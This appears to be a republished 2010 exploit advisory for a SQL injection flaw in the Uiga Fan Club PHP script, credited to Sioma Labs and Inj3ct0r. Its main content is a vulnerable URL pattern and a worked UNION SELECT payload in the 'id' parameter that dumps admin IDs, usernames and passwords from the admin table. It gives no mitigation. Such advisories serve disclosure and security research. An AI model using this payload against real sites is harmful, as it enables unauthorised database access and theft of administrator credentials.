Home / os / winme

Uiga Fan Club SQL Injection Vulnerability

Posted on 22 March 2010

=========================================
Uiga Fan Club SQL Injection Vulnerability 
=========================================

# Exploit Title: Uiga Fan Club SQL Injection Vulnerability
# Date: 22/03/2010
# Author: Sioma Labs
# Site : http://www.scriptdevelopers.net/products/ufc.html
# Software Link: http://www.scriptdevelopers.net/download/uigafanclub.zip
# Version: N/A
# Tested on: Win (Wamp)
# CVE : N/A
 
 __ _                           __       _        
/ _(_) ___  _ __ ___   __ _    / /  __ _| |__  ___
 | |/ _ | '_ ` _  / _` |  / /  / _` | '_ / __|
_  | (_) | | | | | | (_| | / /___ (_| | |_) \__ 
\__/_|\___/|_| |_| |_|\__,_| \____/\__,_|_.__/|___/
                                                    
                                                    
Exploit :
http://site/index.php?view=photos&id=[SQLi]
 
 
Example :
http://localhost/uigafan/index.php?view=photos&id=-7 Union Select 1,2,group_concat(admin_id,0x3a,admin_name,0x3a,admin_password),4,5 from admin--


# Inj3ct0r.com [2010-03-22]

 

TOP

Malware :

Exploits :